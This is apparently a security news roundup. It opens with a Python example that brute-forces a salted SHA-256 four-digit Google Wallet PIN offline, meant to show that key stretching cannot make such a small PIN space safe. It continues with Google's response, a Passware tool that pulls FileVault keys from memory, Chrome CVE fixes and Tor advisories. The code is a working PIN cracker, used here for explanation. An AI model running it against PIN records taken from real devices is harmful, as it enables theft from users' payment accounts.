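Rubin's point that the whole keyspace is 10,000 hashes is easy to make concrete. The code below is an added example, not zvelo's tool: it models the on-device record as SHA-256 over a salt and the PIN (the exact byte layout is an assumption; the post only says salted SHA-256), brute-forces the four digits offline, and shows that a key-stretching KDF such as PBKDF2 only multiplies the attacker's cost by the iteration count rather than changing the size of the search, which is why the fix has to be verification inside the Secure Element, where the attempt counter cannot be bypassed.

```python
import hashlib
import itertools

SALT = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")   # constructed 16-byte salt
ONLINE_ATTEMPTS_BEFORE_LOCKOUT = 5                        # the limit the app enforces


def pin_record(pin: str, salt: bytes) -> bytes:
    """Assumed on-device record: SHA-256(salt || PIN)."""
    return hashlib.sha256(salt + pin.encode("ascii")).digest()


def stretched_record(pin: str, salt: bytes, iterations: int) -> bytes:
    """What a stretched store would hold instead: PBKDF2-HMAC-SHA256."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode("ascii"), salt, iterations)


def crack_pin(record: bytes, salt: bytes, kdf, digits: int = 4):
    """Offline brute force over every numeric PIN of the given length, using
    `kdf(pin, salt)` to derive candidates. Returns (pin, hashes_computed),
    or (None, hashes_computed) if nothing matched."""
    tried = 0
    for candidate in itertools.product("0123456789", repeat=digits):
        pin = "".join(candidate)
        tried += 1
        if kdf(pin, salt) == record:
            return pin, tried
    return None, tried


if __name__ == "__main__":
    pin, n = crack_pin(pin_record("4729", SALT), SALT, pin_record)
    print(f"plain salted SHA-256: recovered {pin} after {n} hashes "
          f"(lockout would have allowed {ONLINE_ATTEMPTS_BEFORE_LOCKOUT})")
    iterations = 1000
    pin, n = crack_pin(stretched_record("0042", SALT, iterations), SALT,
                       lambda p, s: stretched_record(p, s, iterations))
    print(f"PBKDF2 x{iterations}: recovered {pin} after {n} derivations, "
          f"{n * iterations} hash operations; the search space is still 10,000")
```

The numbers are the whole argument: on a rooted phone the attacker reads the salt and hash, so the five-attempt limit never fires, and a 4-digit space is exhausted in under a second whatever the hash; stretching buys a constant factor, not a defence.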


Google has issued this statement on the matter:
The Zvelo study was conducted on their own phone on which they disabled the security mechanisms that protect Google Wallet by rooting the device. To date, there is no known vulnerability that enables someone to take a consumer phone and gain root access while preserving any Wallet information such as the PIN.

This confirms that there should be no issue unless the phone has already been rooted. Google strongly encourages users who have rooted their phone not to install Google Wallet, and all users to add further layers of security to the device (activating the screen lock, disabling USB debugging in settings, and enabling full-disk encryption).

Forensics Vendor Passware warns Mac OS X FileVault 2 easily decrypted

Passware, Inc., a provider of password recovery software for law enforcement, has announced that its forensic tools can break the FileVault disk encryption in Mac OS X.

The original FileVault encrypted the files in a user's home directory with 128-bit AES; FileVault 2, introduced in Mac OS X 10.7, encrypts the whole startup volume. A master password (and, in 10.7 and later, a recovery key) is created as a precaution against the user losing their password.

Passware Kit Forensic v11.3 can decrypt a FileVault-encrypted Mac disk within 40 minutes, regardless of the length or complexity of the password, because it does not attack the password at all: it extracts the volume's encryption key from the target computer's memory, which gives full access to the encrypted disk. The caveat is that the key is only in RAM while the volume is unlocked, so the attack needs physical access to a machine that is powered on or asleep with the disk mounted; a machine that is fully shut down is not exposed this way.


“Full disk encryption is becoming a major obstacle for digital investigations,” said Dmitry Sumin, president, Passware, Inc. “The latest version of Passware Kit Forensic offers multiple approaches to overcoming this problem, such as live memory analysis and extraction of encryption keys for BitLocker, TrueCrypt, and FileVault. This means forensic experts are better armed to approach investigative
challenges with an effective and efficient solution that significantly reduces decryption time and thus allows investigators to focus on data analysis."

Passware Kit Forensic is available directly from Passware for $995 with one year of free updates. PassWare makes this software primarily available for law enforcement.

Chrome v16.0.912.77 patched the Critical Vulnerabilities


Google has released Chrome 16.0.912.77 to fix five vulnerabilities: four rated High and one, a use-after-free in Safe Browsing navigation, rated Critical.

The list of vulnerabilities patched in the updated version:
  • [$1000] [106484] High CVE-2011-3924: Use-after-free in DOM selections. Credit to Arthur Gerkis.
  • [$3133.7] [107182] Critical CVE-2011-3925: Use-after-free in Safe Browsing navigation. Credit to Chamal de Silva.
  • [108461] High CVE-2011-3928: Use-after-free in DOM handling. Credit to wushi of team509 reported through ZDI (ZDI-CAN-1415).
  • [$1000] [108605] High CVE-2011-3927: Uninitialized value in Skia. Credit to miaubiz.
  • [$1000] [109556] High CVE-2011-3926: Heap-buffer-overflow in tree builder. Credit to Arthur Gerkis.

Multiple Vulnerabilities found in Tor, allows a remote Hacking


Tor, an implementation of second-generation onion routing, is affected by multiple vulnerabilities, the most serious of which may allow a remote attacker to execute arbitrary code.

A remote attacker could possibly execute arbitrary code or cause a Denial of Service by exploiting the vulnerability. Furthermore, a remote relay the user is directly connected to may be able to disclose anonymous information about that user or enumerate bridges in the user's connection.

According to the Gentoo Linux Advisory, the following vulnerabilities have been found in TOR:
  • When configured as client or bridge, Tor uses the same TLS certificate chain for all outgoing connections (CVE-2011-2768).
  • When configured as a bridge, Tor relays can distinguish incoming bridge connections from client connections (CVE-2011-2769).
  • An error in or/buffers.c could result in a heap-based buffer overflow (CVE-2011-2778).
Tor users are advised to upgrade to the latest version (0.2.2.35).